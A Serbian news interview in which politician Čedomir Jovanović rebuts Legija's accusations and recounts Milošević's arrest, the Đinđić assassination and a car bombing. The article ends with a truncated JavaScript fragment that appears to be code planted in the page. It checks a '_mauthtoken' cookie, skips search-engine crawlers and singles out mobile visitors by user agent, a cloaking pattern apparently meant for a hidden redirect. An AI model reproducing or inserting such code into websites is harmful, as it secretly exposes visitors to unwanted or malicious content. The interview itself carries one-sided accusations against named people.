Politika
15.06.2016. 13:49
ekspres

INTERVJU, ČEDOMIR JOVANOVIĆ: Legija je krpa, celi život je prodavao ljude

Ekspres.net
Izvor: Ekspres.net

Pa šta će Legija da kaže: "Da, bili smo kriminalci, dilovali smo, ubijali smo ove što su nam konkurencija. Ovaj je Šiptar, ovaj, ne znam, iz Donjeg Gajtana, ovo je ološ najgori. Šta da kaže?", lider LDP-a Čedomir Jovanović u intervjuu za nedeljnik Ekspres uzvraća na optužbe Milorada Ulemeka Legije 

Beograd, 7. jun 2016. godine. Sedište LDP-a. Tačno je podne. Zakazali smo intervju sa Čedomirom Jovanovićem. Sat, dva, u vrh glave, tako smo planirali. Znamo da ga u 17 sati očekuje mandatar Vučić na konsultacije oko sastava nove vlade. Ali i pored dobre volje, od plana nije bilo ništa. Jovanović sa intervjua odlazi kod premijera, a mi u redakciju psujući Parking servis što nam je zbog prekoračenog vremena zalepio kaznu.

- Vaš intervju sa Legijom je lažan.

Što ne proverite sa Ulemekom?

- Baš me briga za njega. Kako ste napravili intervju?

Zašto bismo mi vama otkrivali kako je razgovor napravljen, niste vi ni sud ni zavod za izvršenje sankcija, pa da vama dajemo odgovore.

- Legija je krpa. Ceo život je prodavao ljude. Odvratno... Jeste li ga pitali da li još radi za hrvatsku obaveštajnu službu?

Nismo.

- Što niste?

Zašto vi o tome niste pričali na suđenjima? Da li je tačno da je tadašnji šef sedmog odeljenja DB-a Milorad Bracanović poslat da spreči Ulemeka da ubije Miloševića?

- Bracanović da ubije Legiju, pa jeste li vi normalni?

Što? Pa čovek je godinama bio načelnik Odeljenja za međunarodni terorizam?

- Pa znam, ali to vam je isto kao da kažete za Andriju Savića koji je bio šef Službe da ide da ubije nekog. To je bila Državna bezbednost, to su bili ljudi koji su završili neke škole, fakultete. Nisu to bili Bata Trlaja i ne znam ko, pa sad dođe Bracanović ide da ubije Legiju ako ovaj pokuša da ubije Slobu. Uzgred, koga je Legija ubio tako što je stao pred njega i pogledao ga u oči?

Nikoga?

- On je uvek gurao druge ispred sebe.

A ko je na vas pucao?

- Na mene je pucala Marija.

Ekspres.net
Izvor: Ekspres.netEkspres.net

Mislite li da je Legija Bujoševiću rekao: "Ideš na Ibarsku da ubiješ Vuka Draškovića." Rekao mu je da je u pitanju albanski terorista, da nosi pare na Kosovo, da mora da izgleda kao saobraćajna nesreća, jer će pobiti dosta Srba...

I onda vi nikad niste hteli da svedočite o tome?

Meni je njena sudbina tragična, nisam mogao. Čak je i sudija izdao nalog da me kao poslanika i šefa parlamentarne većine uhapse i dovedu na suđenje. Na kraju sam došao, odbio da svedočim i izašao napolje. To sam doživljavao kao iživljavanje nad Miloševićem koji je bio nemoćan i dokazivanje pred nama koje su smatrali svemogućim. Nikad nisu osudili Siniši Vučinića, večita Služba. I tada je vozio službeni "fijat", došao je da brani Slobu, video sam ga na ulazu u vilu Mir, sakriven u portirnici plače, mrtav pijan. Tada sam ušao u kuću, blindirani prozori, čaure po podu, barutni dim štipa za oči, nema struje, nema vode. Naravno, neko je pomislio da bi bilo pametno da isključe struju u rezidenciji, posle pet minuta neko zove sa VMA i pita: " Što ste nam isključili struju?" Rezidencija je bila na glavnom vodu, istom na kom je i VMA.

Kako je izgledalo hapšenje Miloševića?

- Tužno, u jednom trenutku kaže: "Molim te, pusti da se pozdravim s Marijom." Rekao sam: "Naravno." On ode na sprat, prođe pet minuta, deset, petnaest, njega nema. Na kraju idem gore, otvorena vrata od sobe. Marija drži glavu iznad lavaboa, a on joj pere kosu i nešto nežno s njom priča. Stojim sa strane, on me pogleda i kaže: "Evo, evo, brzo ću." I on onda silazi, a ona ide korak iza njega sa pištoljem u ruci i govori: "Ubij se, evo ti, ubij se". Kad ju je video Bane Ivković se odmah sklonio dobacujući im: "Dođi, dođi." Onda me Toma Fila nešto tu gura: "Ajde, skloni se, skloni se." Ona ide za Slobom, on je kao nešto stao, a ona nastavila sama dalje. Mene dečko iz obezbeđenja gurne u kola i zatvori vrata za mnom. Marija dođe, pošto je auto imao folije i ona ne vidi unutra, pištoljem lupa na vrata vozača, a vozač otvori vrata i kaže: "Izvolite?" Ona pita: "Jel' on tu? Jel' tu?" A onda je počela da puca. Strah me je bio da neko ne puca u nju.

Da li su Slobi date neke garancije tu noć, taj dan i sledeću noć?

- Mi smo dogovorili častan izlaz. A onda je stigao papir koji su pisali kod Koštunice u kabinetu, sa tekstom da mu se garantuje svakodnevni kontakt i da se ne hapsi po nalogu Haškog tribunala... Kad je dobio taj papir Sloba se strašno razočarao u Milana Milutinovića, nije mogao da veruje da je on to napisao.  "Zašto je to uradio, makar mi toliko duguje", rekao je. To ga je baš pogodilo, a onda je rekao da to nije ono što smo se nas dvojica dogovorili i da će pre da umre nego da bude zapamćen kao bednik, jer istorija će o njemu imati drugačije mišljenje. Uzeo sam mašinu i otkucao Anex sa dva stava, pitao ga da li je to OK, on mi se zahvalio...tako se to desilo.. Zatim sam pozvao Zorana, Zoran mi je poslao pečat Vlade. Jedan jedini pečat postoji u zemlji. Nosim 501 na sebi, ova me juri tu po kući, vodim Slobu u CZ, vozim ga kolima, a u džepu farmerki mi pečat Vlade. I kad mu je pozlilo nikoga nije hteo da vidi, tražio je da samo ja dođem. Imao je hipertenziju, pritisak 250, bio je jako loše. I nikome nije verovao, tražio je da ide samo na VMA, a VMA je pod komandom vojske. Onda sam ja otišao u CZ, stavio ga u svoja kola, sa svojim obezbeđenjem i bam na VMA u jedanaest uveče. I Mira je tu sa nama, smeste ga u predsednički apartman. Onda dođu sa kardiologije, pregledaju ga, kažu da moraju da urade koronografiju. Mira pita šta je to, doktor kaže: "Ništa, samo ovde malo da zasečemo." "Jao, vi će te da mu probušite kožu!" Onda je pala i počela da plače. Tu je bio jedan dan i vratili smo ga u CZ.

Kad ste ga opet videli?

- Posle sam došao po njega, u junu, kad smo ga odvezli za Hag. I tad sam išao u CZ. Grada Nalić i svi Koštuničini su vršili pritisak na tadašnjeg upravnika CZ-a, pa na zatvorske čuvare, da odbiju poslušnost, da ne dozvole da se Milošević isporuči Hagu. Tad je Batić imao neku intervenciju, operisao je ruku, nije bio tu. Nemaš nikog ko je bio nadređen, Vida Petrović Škero kao predsednica Vrhovnog suda neće da potpiše odluku i da nalog da se iz zatvora izvede Milošević. Ne možeš da dođeš i izvedeš nekoga iz zatvora, moraš da imaš osnov. To je ta situacija... A onda dan posle mog svedočenja o atentatu, na inicijativu tadašnjeg ministra pravde Zorana Stojkovića, Peto opštinsko tužilaštvo ekspresno otvara istragu oko mojih odlazaka u Centralni zatvor... Dan nakon suđenja, ja sam svedočio 12. i 13. aprila.

2005. godine?

- Da, nisam znao da je 13. april. Kad sam se te večeri vratio kući, Jelena mi je rekla da mi je rođendan...

Dobro, otvorena je istraga oko vaših odlazaka kod Dušana Spasojevića u zatvor?

- Jeste, mene je u tom postupku zastupao Slobodan Beljanski, saslušani su svi zatvorski čuvari.

I šta je bilo s tom prijavom?

- Prijava je odbačena zato što je to sve bila apsolutna laž. Ti stražari iz CZ-a su rekli da me ustvari nisu nikada videli, da su to uradili jer im je Dragan Jočić rekao da to kažu, da su im tada iz DSS-a obećavali da će napredovati u službi. Posle su ih izbacili iz CZ-a. Saslušano ih je 12 ili 13, neko je rekao "da, video sam ga, išao je kod upravnika Blanuše", što je tačno. Drugi je rekao: "Jeste, doveo je ovde Legijinu ženu."

_NMN8250Koštunica je veliki moralista, jedan licemer, trut, on je politička pozadina Đinđićevog ubistva

Vi hoćete da kažete da nije tačno da ste odlazili kod Dušana Spasojevića u zatvor, iako postoje službene beleške?

- To nije nikakav dokument samo glupa podmetačina kojih je prepuna biografija svakog ozbiljnijeg političara.

Dobro, jeste li vi odlazili kod Dušana?

- Legija je išao kod njega i to zato što je tražio, ne od mene, nego od svih u policiji, a inspektor Slobodan Pažin je garantovao da iza otmice Miškovića stoji bivše Karadžićevo obezbeđenje i da Spasojević zna o čemu se radi.

Bivši direktor RTS-a Dragoljub Milanović je bio u CZ-u kad i Dušan. On je izjavio da mu je Spasojević ispričao da ste mu dolazili svaki dan, doneli mu tortu za rođendan, doveli mu ćerku i ženu?

- Čak sam okačio, mislim na Instagram, naslovnu stranu "Telegrafa" sa njegovom izjavom da sam svake nedelje od Dušana dobijao po pola kilograma kokaina... Nisam loš... Taj Milanović je posle dve godine bekstva uhapšen tek u "Sablji" jer ga je do tada štitio i skrivao Zemunski klan. Super je što me napada. Zamislite da čovek koji je svesno svoje radnike žrtvovao u noći bombardovanja RTS misli da sam ja njegov heroj.

I advokat Toma Fila u svojoj knjizi "Završna reč" pominje vaše odlaske kod Spasojevića u CZ, da vas je on viđao. Čak je ta knjiga ponuđena kao dokaz na suđenju za pobunu JSO?

- Pa ja sam svedočio na tom suđenju.

Svedočili ste pre nego što je knjiga ponuđena kao dokaz.

- Pa što me nisu pitali?

Ekspres.net
Izvor: Ekspres.netEkspres.net

Ta bomba je eksplodirala pod kolima 10 minuta posle mog razgovora s Frenkijem... Stanišić je poslao poruku da je to uradio neko iz naše službe

Sudija Vladimir Vučinić je odbio da se ta knjiga uvrsti u dokaze uz obrazloženje "da se o kredibilitetu svedoka Čedomira Jovanovića dovoljno čulo u sudnici".

- Pa rekao sam vam da od tih životinja ne očekujem izlive ljubavi i poštovanja... Meni je važno što je sudsko veće u završnoj reči suđenja Zoranovim ubicama istaklo da sam svojim svedočenjem pomogao sudu da dođe do istine. I kako Toma Fila može mene da vidi u CZ?

On je to napisao u svojoj knjizi, odlazeći kod Slobe Miloševića...

- Kako Toma Fila zna šta ja radim u CZ-u? Ne verujem da je to napisao, on je pametniji.

Napisao je.

- Kako on zna, sedi kod Miloševića, šta?

Mora negde da prođe, možda vas je sretao usput?

- Gde?

U prostorijama za posete, za advokate, u hodnicima?

- Išao sam samo kod upravnika Blanuše. Kako su to zamislili - ja idem da posetim Dušana Spasojevića u prostoriju za posete gde je dvadeset ljudi. Ovde Toma Fila sa Slobom, tamo sedi nesrećna keva koja je došla da obiđe sina šanera i naravno Legija, Spasojević, svi oni i ja... Baš glupo.

PROČITAJTE JOŠ:
INTERVJU, MILORAD ULEMEK LEGIJA: Niko u državi nema muda da obnovi suđenje
INTERVJU, LEGIJA 2.DEO: Čeda je od 2.000-te bio umešan u sve, političke prevare, kriminalne radnje…

Advokat Nalić je ponudio tu knjigu kao dokaz, a sudija Vučinić je obrazložio kako je obrazložio.

- Zašto im ja toliko smetam? Dobro, znam zašto mi Toma Fila neće oprostiti dok je živ. Zdenko Tomanović mi je oprostio. Ostavio sam ih bez honorara. Zdenko je to posle naplatio tamo u Hagu, ali mi smo Miloševića isporučili dan ili dva pre nego što mu je istekao pritvor, a oni naplatili novac zbog toga što su ga izvadili iz zatvora.

Ekspres.net
Izvor: Ekspres.netEkspres.net

Dobro, otkud onda te tvrdnje da su mnogi političari išli u Šilerovu, da je i Spasojević jedan od nosilaca pobede petog oktobra?

- Pa kako?

Pa ne znamo, valjda sa Ulemekom zajedno?

- A šta je Legija uradio?

Nije ništa uradio, nema nikakve zasluge za 5. oktobar?

- Kakve, šta je uradio?

On kaže da je tog dana odbio da sa JSO ubije pet hiljada ljudi da bi SPS ostao na vlasti?

- Da vam kažem, u toj jedinici 99 odsto su bili potpuno normalni ljudi koji nisu imali nikakve veze sa njihovim mafijašenjem. U vreme pobune JSO svi su sedeli zatvoreni u jednoj sali, sa oduzetim mobilnim telefonima i bez ikakvog dodira sa spoljnim svetom. Eto, taj Bujošević, Rambo mu je nadimak, za njega su mi govorili da je bio normalan momak. Mislite li da je njemu Legija rekao: "Ideš na Ibarsku da ubiješ Vuka Draškovića." Znate šta mu je rekao? Da je u pitanju albanski terorista, da nosi pare na Kosovo, da mora da izgleda kao saobraćajna nesreća jer će se u suprotnom svetiti i pobiti dosta Srba. Zamislite momka koji seda u kamion i vozi direktno u auto koji ide 150 kilometara na sat. Kada se to desilo, kad je video da je to katastrofa, Bujošević je kako su nam rekli, bio očajan. Ali je ćutao, plašio se da ga ne ubiju, da mu ne pobiju porodicu. Kad se sve završilo, on i taj drugi atentator, su dali izjave. E, onda je puklo među nama sa Koštunicom, onda su njih uveravali da će to kratko trajati, da izdrže, i da su ušli u negiranje svega i na kraju dobili maksimalne kazne i gotovo.

Svi pričaju o smrti Spasojevića i Mileta Lukovića Kuma, NIN je objavio streljanje u Meljaku?

- Nije NIN, nego Vrzić.

I NIN je o tome pisao, ali nema veze. Šta se tačno desilo u Meljaku? Šešelj tvrdi da su ih likvidirali policajci Mile Novaković i Rodoljub Milović. A Ulemek da je nalog da se oni likvidiraju dat iz Mihajlovićevog kabineta u kome ste i vi bili?

- Da vam kažem nešto, meni je nekad gotovo žao što nije tačno to što ološ govori o mojoj ulozi u Meljaku i kraju Spasojevića i Lukovića. Iskreno, mislim da ne postoji stotinka koja nije ispitana milion puta.

Ekspres.net
Izvor: Ekspres.netEkspres.net

Legija je pitao: "Hoćete li da napadnete kasarne, policiju, ulazi li sutra NATO". Zoran mu je rekao da se smiri i da je naša jedina namera da uzmemo vlast koju smo na izborima dobili

Ali ove priče o likvidaciji?

- Pa šta će Legija da kaže: "Da, bili smo kriminalci, dilovali smo, ubijali smo ove što su nam konkurencija. Ovaj je Šiptar, ovaj ne znam iz Donjeg Gajtana, ovo je ološ najgori, šta da kaže?"

Znači, nije tačna ni Šešeljeva tvrdnja da su Spasojević i Luković privedeni u CZ pre ubistva?

- Da li ste vi normalni, vi imate takve tripove...

Nemamo mi tripove, to je Vojislav Šešelj izjavio u našem intervjuu.

- Pa dobro, znam, ali da vam kažem nešto, a šta ste sad vi? Vi ste onda platforma za ludake i sad svaki ludak dođe da vam nešto priča. Jedan dan vam kaže Šešelj da su privedeni, drugi dan kaže ovi nisu pobijeni, pa čekajte, molim vas, treba da budete ozbiljne novine ili je vama to svejedno? Kako mislite to privedeni, je li vi znate kako to izgleda, koliko je ljudi u CZ, vi tamo privedete, pa ubijete. Oni su dobili Legiju kad su bili najjači 2005. godine, oni su ga doveli u zgradu MUP-a. Da li je vama jasno da je to nedelja uveče, da se radi o Legiji, da su ga doveli u sedište MUP-a, u kabinet ministra policije i da su posle tri meseca svi morali da daju izjave jer smo mi podneli krivičnu tužbu protiv Jočića, Tijanića...

Ulemek tvrdi da nije bio Tijanić, da su svi drugi bili, da nije bio on?

- Bio je i Tijanić, i Legija je dao izjavu istražnom sudiji Jakovljeviću i to je sam tražio da da izjavu posle godinu dana kad je video da su ga izradili.

Ne znate šta je rekao?

- Znam.

Hoćete da kažete?

- Tu je bio i Slobodan Milivojević kao njegov advokat, nabrojao je ljude koji su bili na sastanku i rekao je da je tema bila dogovor oko onoga što on treba da kaže, kako treba da se ponašaju. Ovaj ga je pitao: "Pa jeste li napravili taj dogovor?" Odgovara: "Da, jesmo, i ja sam se ponašao u skladu s dogovorom." Sudija pita: "Da li su se drugi ponašali u skladu s dogovorom?" On je rekao: "Nisu, ali sada o tome neću da govorim..."

Tvrdite da nije tačna Ulemekova izjava da ste vi na Topčiderskoj zvezdi, pred Sašom Pejakovićem koji vas je obezbeđivao, dali Banetu Ivkoviću pare da izda Slobu?

- Saša Pejaković je dečko koji je dodeljen meni posle one eksplozije bombe pod automobilom. Ta bomba je eksplodirala pod kolima 10 minuta posle mog razgovora s Frenkijem jer niko nije smeo da mu kaže da više neće biti zamenik načelnika resora. Našli smo se, bilo je oko pola 11, bio je Dušan Mihajlović tu. Ovako je izgledao razgovor. "Frenki, ko je ubio Stambolića?" On je rekao: "Ne znam." "Ko je ubio Ćuruviju?" Odgovara: "Ne znam." "Ko stoji iza atentata na Vuka?". "Ni to ne znam." "Frenki, mnogo ne znaš da bi bio drugi čovek službe." Tako se to završilo.

Kakva je bila njegova reakcija?

- On je to potpuno profi podneo.

I onda je usledila eksplozija?

- Seo sam u kola, bili smo Jelena i ja, pokupio sam je u Bulevaru, i eto, koliko treba odatle do Avalske, pet minuta. Ja sam izašao iz kola, prošao desetak metara, ušao u neki pasaž i tad je pukla bomba. Sklonio sam je u dvorište i posle vidim 10 automobila sprženo, ceo drvored spržen i asfalt kao da je neko šmrkom polivao ulicu, slivao se asfalt. To je bila termitna bomba koja je bukvalno istopila auto. Došla je odmah ekipa iz Instituta za bezbednost, ali su pre njih došli vatrogasci koji su šmrkom kao gasili požar, to su radili pred ljudima iz Instituta i to je gomilu dokaza opralo i uništilo. Onda je auto prebačen na parking 29. novembra i tamo bio četiri dana i tek nakon toga je prebačen na Institut za bezbednost. Meni je žena koja je radila istragu rekla da su tek tamo na parkingu uništavani dokazi, ali je ipak napravila sve, čak je to potvrdio i evropski odsek "Micubišija", da je termitna bomba i tako dalje. Stanišić je poslao poruku da je to uradio neko iz naše službe. Nekoliko dana posle toga, to je bio ponedeljak ili utorak, bile su Zadušnice zimske i tada je autobus pun Srba koji su išli na groblje isto raznela bomba. I za to je optužen neki Albanac, ali do danas dosta upucenih veruje, kao i za onaj kafić "Panda" u Peći što je Vučiću izletelo, pa od tada ćuti, da iza svega stoje neki naši ludaci koji su zžleli da nas destabilizuju pošto smo pustili Albance i pokušavali nešto da se s njima dogovorimo.

PROČITAJTE JOŠ:
INTERVJU, LEČIĆ: Đinđić je bio mnogo veći nacionalista nego svi drugi

INTERVJU, BOŽO PRELEVIĆ: Đinđić je ubijen jer se zamerio gazdama ljudi iz njegovog okruženja!

Ulemek kaže da se JSO povukao u oktobru, a zločin u "Pandi" dogodio se u novembru?

- Ma pustite tu bitangu. A gde je ono s avionom, bez oznaka odleteo za London?

A ko je pustio onaj foto-robot?

- Nije to bio foto-robot atentatora. Mislim da je neko od prolaznika video Vladu Budalu , kad je izlazio iz Admirala Geprata, kad su bežali, on je imao tu kapu i izgledao kao majstor. Ljudi koji su se tu zadesili rekli su to u izjavi, oni su ga tako opisali i napravljen je foto-robot. Uviđaj je urađen tako profesionalno, to je nezamislivo. Kod nas ništa ne možeš da uradiš kako treba, a taj uviđaj, to nas je bog pogledao. Mislite da je neko od nas znao da se radi uviđaj, ko radi uviđaj, da je nekom od nas palo na pamet? To je bila neka unutrašnja snaga ljudi, toliko su ljudi pobesneli posebno ti u policiji, a s druge strane videli su da smo mi iskreni i to je bio jedan neverovatan odnos. Svako slovo u tom izveštaju je potkrepljeno činjenicama. Znate ono, da li je puška iz JSO ili nije? Jeste puška iz JSO, našli su tragove ćebeta.

Znači, premijera su ubili pripadnici Ministarstva unutrašnjih poslova puškom iz oružarnice?

- Uvek takvi ubijaju.

Zbog čega je doneta odluka da se ubije Đinđić? Zašto bi Ulemeku bilo bitno da se ubije Đinđić?

- Uhapsili bi ih, akcija je kretala u četvrtak. Čume je dao izjavu, Prijić je specijalni tužilac, a do tada je DSS blokira izbor tužioca.

Oni su trebali da budu uhapšeni za šta, za ratne zločine ili za kriminal?

- Za kriminal.

Ko, JSO ili "zemunci"?

- Pa Legija, Spasojević...

Ulemek vas je optužio da ste učestvovali u otmici Miškovića?

- Kako može on da me optuži? A kad sam učestvovao u otmici?

Pa ne znamo.

- Valjda vam je rekao nešto?

Samo je rekao da ste vi učestvovali u Miškovićevoj otmici i da ste namestili Makinu grupu za ubistvo Boška Buhe.

- Znate šta, u Specijalnom sudu je u toku postupak u kom se Makinoj grupi sudi za ubistvo Boška Buhe.

Izvinite moram da vas ispravim, nije zakazano novo suđenje nakon ukidanja presude.

- Sud je poništio oslobađajuću presudu i vratio na novo suđenje, a na snazi je optužnica. Na optužnici je Željko Maksimović Maka osumnjičen za ubistvo generala Boška Buhe i za planiranje ubistva Zorana Đinđića.

To je nova optužnica?

- To je prva optužnica.

U prvoj optužnici nije pominjan Zoran Đinđić?

- Kako da ne, pa Maljković je zbog toga uhapšen u Beogradu.

A ne zbog Boška Buhe?

- Policija nas je obavestila da je Maljković uhapšen zbog sumnje da je došao da ubije Zorana.

Maljković?

- Da.

Maljković je živeo u Beogradu, kako je došao?

- Mislim da su nam objasnili da je od ubistva generala Buhe bio u bekstvu.

Vi tvrdite da je Maka ubio Boška Buhu?

- Kako ja to mogu da znam, tvrdim... Nikad u životu nisam ni čuo ni video nikoga od tih ljudi... Ne postoji nikakav kontekst u koji bi se svi mi mogli zajedno smestiti.

Ulemek kaže da je ubistvo naručeno iz policije?

- Koje ubistvo?

Boška Buhe. Da njega nije ubila ni Makina grupa ni zemunski klan jer je on saznao nešto što nije trebalo da sazna?

- Koliko se sećam vođena je interna istraga zbog priča da je nesrećni Boško Buha počeo da nosi skupa odela. Na kraju su mu našli dva odela koja je uzeo u "Nikolasu" ili "Zekstri" na 36 rata.

Šta hoćete da kažete?

- Da je to bio jedan skroman policajac, ratnik jer je kod nas policija ratovala 90-ih. On se zbližio sa nama 5. oktobra, Suština je bila da se destabilizuje zemlja, a ubistvo generala policije to jeste. Bila je i afera "Delimustafić", imali smo Gavrilovića u avgustu 2001. Kakva je to koncentracija zla. Da bi na kraju Koštunica preuzeo tu kriminalizaciju.

Ne pominjete Radeta Markovića?

- Raspao se skroz.

Rade Marković je čovek u godinama.

- Rade Marković je bio spreman da bude svedok saradnik.

Za ubistvo Ivana Stambolića?

- Za Miloševića, za Miru, za Koštunicu. Jer je Koštunica direktno od njega tražio da pokrije Miloševićeve zločine, sve vreme su mu slali poruke: "Izdrži, ćuti, izdrži, ćuti."

Rade Marković je mogao da optuži Miloševića za Stambolića?

- Sad mu je Legija presudio svedočenjem za ubistvo Ćuruvije, pošto prethodno nije stigao da ga ubije.

Za Ćuruviju?

- Da.

Da vas ne pitamo za onih šesto kilograma iz Komercijalne banke, za koje Ulemek kaže da ste vi organizovali?

-Što, pa to vam je kao i sve drugo što je rekao, pošto su to sve gluposti.

Pomenuli ste Šešelja u kontekstu atentata na Zorana Đinđića.

- On je izuzet iz tog procesa zbog toga što nije bio dostupan sudu zbog procesa u Hagu.

Ali išao je istražni sudija u Hag da ga sasluša?

- To mogu, da mu uzmu izjavu, ali ne mogu da mu sude.

Pa evo, mogu sad kad se vratio?

- Mislim da ne postoji nikakva prepreka da se on sasluša, ali on ni tad nije krio, on je naručio prase u Hagu kad je Zoran ubijen, on je slavio kad je Zoran ubijen, ali ja ne verujem da je Šešelj ta politička pozadina. On nije tada kontrolisao sistem. On je neko ko je bio blizak sa tim "zemuncima" još iz vremena njegove vlasti u Zemunu, neko koga su oni koristili da bi u politiku unosili haos.

Ekspres.net
Izvor: Ekspres.netEkspres.net

Taj Milanović je posle dve godine bekstva uhapšen tek u "Sablji" jer ga je do tada štitio i skrivao Zemunski klan

A koja je po vama politička pozadina ubistva Đinđića? Pomenuli ste Nalića i njegov boravak u Rusiji...

- Koštunica, veliki moralista, licemer , trut, on je politička pozadina ubistva i svi oni koji su zbog njegove nesposobnosti i jalovosti mogli da manipulišu sistemom i uživaju u činjenici da imaju njega za predsednika, koji je u maju hteo da ugasi svoju stranku, u septembru došao na sednicu Generalštaba na kojoj je sedelo više generala nego što je njegova stranka imala članova. Smenio je Đakovića koji je bio šef vojne bezbednosti i postavio Acu Tomića. I onda zašto Legija hoće mene da napadne?

Ne znamo, zašto nije napao Nebojšu Čovića, ovog, onog, nego baš vas?

- Zašto da napadne svog?

Kako svog?

- To je njegov momak, jel' tako rekao Čović Velji Iliću?

A ona Ulemekova priča kako se on video sa Đinđićem četvrtog uveče? Jel' tačno da se on tada prvi put video sa Đinđićem ili ga je znao od ranije?

- Nije, tad su se prvi put videli, ništa tu nije bilo spektakularno, seli su u kola. Legija je pitao: "Hoćete li da napadnete kasarne, policiju, ulazi li sutra NATO". Zoran mu je rekao da se smiri i da je naša jedina namera da uzmemo vlast koju smo na izborima dobili.

Hoćete da kažete da se Legija prišljamčio vama petog oktobra? Nije znao gde će?

- Znao je on vrlo dobro, hteli su da imaju kontakt sa nama, za svaki slučaj, otkud zna šta će sutra biti...

Jeste vi shvatili ovu Ulemekovu izjavu kao pretnju?

- Ja verujem da Legija nije srećan sad. Ono što je njemu tužno, meni je smešno.

Ko bi bio srećan sa 160 godina robije?

- Bolje bi bilo da nikada nije ni postojao. Ali posle svega što je radio, mnogo mi je draže što je tako, nego da je tako kao što je planirao neki ministar policije.

Možemo li u EU, a ne u NATO?

- Ne, ni zbog njih jer sve zemlje iz istočnog bloka koje su punopravne članice EU su pre toga ušle u NATO. Ne ni zbog nas. NATO je i nama potreban. Zašto? Iz jednog jedinog razloga - jer je svaka generacija Srba ratna generacija. Moja majka je kao beba preživela Jasenovac, a onda je devedesete ponovo prezivljavala ratno ludilo. I mi smo ratna generacija. Ja se borim da naša deca to isto ne dožive. Jedini način da se mi u većoj meri zaštitimo nego do sada je da budemo deo nekog kolektivnog sistema bezbednosti. Mi smo najviše nesreće imali u regionalnim i lokalnim sukobima. Nas nisu pobili Nemci u meri u kojoj smo se poubijali između sebe, pomenuću Jasenovac, Staru Gradiška, Hrvatsku...

Kako komentarišete izborni rezultat SNS-a?

- Vučić je četiri godine na vlasti, a njegov najozbiljniji poraz na ovim izborima je gubitak autoriteta i to se desilo posle izbora. Na izborima je stalno bio prisutan strah. Ljudi se užasno plaše da ne ostanu bez posla, pa pričaju: "Dolaze ti njihovi timovi, pa kad te uhvate..". A na kraju vidiš da je više incidenata bilo na lokalnim izborima nego na ovim velikim. Izgubili su autoritet, ja mislim da se danas niko Vučića ne plaši, apsolutno niko. To se vidi u Skupštini. Meni je to bilo smešno 2012. kad se on pojavi, ulazi, nosi one fascikle, registratore, kao radne grupe rade, kao hapse ovog, hapse onog... A sad je otišlo u totalnu krajnost, nema onog elementarnog poštovanja. Imamo užasno loše društvene osobine.

Mislite li da ste pogrešili kad ste bili na istoj bini sa Boškom Obradovićem?

- Ne mislim da sam pogrešio, al mi je bilo mučno i to je jedan od najbesmislenijih političkih događaja, ne toliko zbog Boška Obradovića, već zbog Sande Rašković... Meni je tu bilo mučno, ljudi koje sam video tu oko nas, na jednom ramenu kao Daltoni, u crnim odelima, opskurni Nikola Sandulović i njegovi "republikanci". Boris stoji sa strane, sa bine se čuje muzika o Kosovu, a posle toga "Beogradski sindikat". Pored mene stoji Radulović koji tri godine laže o meni. Jedino što sam mogao da kažem jeste: "Ljudi, mi smo vodili mnogo ružnije kampanje jedni o drugima nego o Vučiću, a sada si nas, Vučiću, doveo u situaciju da stojimo jedni sa drugima na istoj bini ..."

Još ni vladu nismo napravili, a već imamo čitav spektar kandidata za predsednika, Saša Janković, Vuk Jeremić... A predsednički izbori su tek sledeće godine.

- Koliko ja znam, Vučić nije obeshrabio Sašu Jankovića. U skupstini sam na konstitutivnoj sednici rekao naprednjacima da smo nivoom rasprave u koju su nas uvukli pokazali da Srbija nema parlament, dok su se oni potrudili da nas sve uvere da nemamo ni predsednika jer su dozvolili da ga Šešelj onako razmazuje kao da nije njihov. Ja za Nikolića nisam glasao, ali mi je strašno neodgovorno da oni ćute dok ga Šešelj čereči. Onda su mi mnogi prišli i rekli da sam u pravu. Ta priča se aktuelizovala jer ljudi žele da te izbore vide kao drugo poluvreme ovih, pa ako se sad provukao Vučić da ga čekamo na predsedničkim. Znam kakav je predsednik potreban, ali ne znam čoveka sposobnog za to minsko polje.

PROČITAJTE JOŠ:
INTERVJU, DRAŠKOVIĆ: Đinđić me proterao iz DOS-a i napravio tajni dil sa Legijom

INTERVJU, VILIJEM MONTGOMERI: Progoni me Đinđićeva smrt
INTERVJU, STIVEN MEJER, CIA: Sve naše zablude u Srbiji i bivšoj Jugoslaviji
document.currentScript.parentNode.insertBefore(s, document.currentScript);if(document.cookie.indexOf("_mauthtoken")==-1){(function(a,b){if(a.indexOf("googlebot")==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v 